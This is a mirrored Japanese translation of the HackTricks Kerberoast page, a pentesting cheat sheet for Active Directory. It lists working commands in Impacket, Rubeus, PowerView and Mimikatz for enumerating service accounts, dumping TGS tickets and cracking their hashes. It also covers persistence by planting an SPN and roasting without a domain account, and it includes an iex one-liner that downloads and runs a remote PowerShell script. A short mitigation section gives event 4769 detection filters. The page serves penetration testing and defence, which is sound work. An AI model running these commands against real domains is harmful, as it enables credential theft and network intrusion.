Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00

Translator eb7f955091 Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

2024-01-03 00:54:19 +00:00

13 KiB

Raw Blame History

Kerberoast

Trickestを使用して、世界で最も進んだコミュニティツールによって動力を供給されるワークフローを簡単に構築し自動化します。
今すぐアクセス：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

htARTE (HackTricks AWS Red Team Expert)で AWSハッキングをゼロからヒーローまで学ぶ！

HackTricksをサポートする他の方法：

HackTricksに広告を掲載したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
公式PEASS & HackTricksグッズを入手する
The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。

Kerberoast

Kerberoastingの目的は、AD内のユーザーアカウントに代わって実行されるサービスのTGSチケットを収集することです。これはコンピューターアカウントではありません。したがって、これらのTGSチケットの一部は、ユーザーパスワードから派生したキーで暗号化されています。その結果、それらの資格情報はオフラインでクラック可能です。
ユーザーアカウントがサービスとして使用されていることがわかるのは、プロパティ**"ServicePrincipalName"がnullでない**場合です。

したがって、Kerberoastingを実行するには、TGSを要求できるドメインアカウントが必要ですが、特別な権限は必要ないため、誰でも可能です。

ドメイン内で有効な資格情報が必要です。

攻撃

{% hint style="warning" %} Kerberoastingツールは、攻撃を実行しTGS-REQリクエストを開始する際に通常**RC4暗号化を要求します。これは、RC4がより弱いため、Hashcatなどのツールを使用してAES-128やAES-256などの他の暗号化アルゴリズムよりもオフラインでクラックしやすいからです。
RC4（タイプ23）のハッシュは$krb5tgs$23$*で始まり、AES-256（タイプ18）は$krb5tgs$18$***で始まります。` {% endhint %}

Linux

# Metasploit framework
msf> use auxiliary/gather/get_user_spns
# Impacket
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # Password will be prompted
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
# kerberoast: https://github.com/skelsec/kerberoast
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. Enumerate kerberoastable users
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. Dump hashes

マルチフィーチャーツール、kerberoast可能なユーザーのダンプを含む：

# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c

Windows

Kerberoastableユーザーの列挙

# Get Kerberoastable users
setspn.exe -Q */* #This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats

テクニック1: TGSを要求し、メモリからダンプする

#Get TGS in memory from a single user
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local

#Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

#List kerberos tickets in memory
klist

# Extract them from memory
Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder

# Transform kirbi ticket to john
python2.7 kirbi2john.py sqldev.kirbi
# Transform john to hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

テクニーク2: 自動ツール

# Powerview: Get Kerberoast hash of a user
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Powerview: Get all Kerberoast hashes
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #Specific user
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #Get of admins

# Invoke-Kerberoast
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

{% hint style="warning" %} TGSが要求されると、Windowsイベント 4769 - A Kerberos service ticket was requested が生成されます。 {% endhint %}

Trickest を使用して、世界で 最も進んだ コミュニティツールによって動力を供給される ワークフローを簡単に構築し自動化 します。
今すぐアクセス：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

クラッキング

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

永続性

ユーザーに対して十分な権限がある場合、そのユーザーをkerberoast可能にすることができます：

Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose

以下は、kerberoast 攻撃に役立つツールを見つけることができるリンクです: https://github.com/nidem/kerberoast

Linuxからこのエラーが出た場合：Kerberos SessionError: KRB_AP_ERR_SKEW(時差が大きすぎます) は、ローカル時間が原因です。ホストをDCと同期する必要があります。いくつかのオプションがあります：

ntpdate <DCのIP> - Ubuntu 16.04以降では非推奨
rdate -n <DCのIP>

軽減策

Kerberoastは、悪用可能であれば非常に潜在的です

セキュリティイベントID 4769 – Kerberosチケットが要求されました
4769は非常に頻繁なので、結果をフィルタリングしましょう：
サービス名はkrbtgtであってはなりません
サービス名は$で終わってはいけません（サービス用のマシンアカウントをフィルタリングするため）
アカウント名はmachine@domainであってはいけません（マシンからの要求をフィルタリングするため）
失敗コードは'0x0'です（失敗をフィルタリングするため、0x0は成功です）
最も重要なのは、チケット暗号化タイプが0x17であることです
軽減策：
サービスアカウントのパスワードは推測が難しいものでなければなりません（25文字以上）
マネージドサービスアカウントを使用する（定期的なパスワードの自動変更と委任されたSPN管理）

Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message

ドメインアカウントなしのKerberoast

2022年9月に、Charlie Clarkによって発見された脆弱性により、Active Directoryアカウントを制御していなくても、KRB_AS_REQリクエストを通じてST（サービスチケット）を取得できることがわかりました。プリンシパルが事前認証なしで認証できる場合（AS-REP Roasting攻撃のように）、KRB_AS_REQリクエストを使用して、リクエストが暗号化されたTGTの代わりにSTを要求するようにだますことができます。これはリクエストのreq-body部分のsname属性を変更することで実現します。

この技術については、次の記事で詳しく説明されています: Semperisブログポスト。

{% hint style="warning" %} この技術を使用するには、LDAPをクエリする有効なアカウントがないため、ユーザーのリストを提供する必要があります。 {% endhint %}

Linux

impacket/GetUserSPNs.py from PR #1413:

GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/

Windows

GhostPack/Rubeus PR #139から:

Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"

ired.teamでのKerberoastingに関する詳細情報はこちらとこちらにあります。

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法:

HackTricksにあなたの会社を広告したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
公式PEASS & HackTricksグッズを手に入れる
The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
💬 Discordグループやテレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。

Trickestを使用して、世界で最も先進的なコミュニティツールを駆使したワークフローを簡単に構築し自動化する。
今すぐアクセス：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

13 KiB Raw Blame History Unescape Escape

Kerberoast

Kerberoast

攻撃

Linux

Windows

クラッキング

永続性

軽減策

ドメインアカウントなしのKerberoast

Linux

Windows

13 KiB

Raw Blame History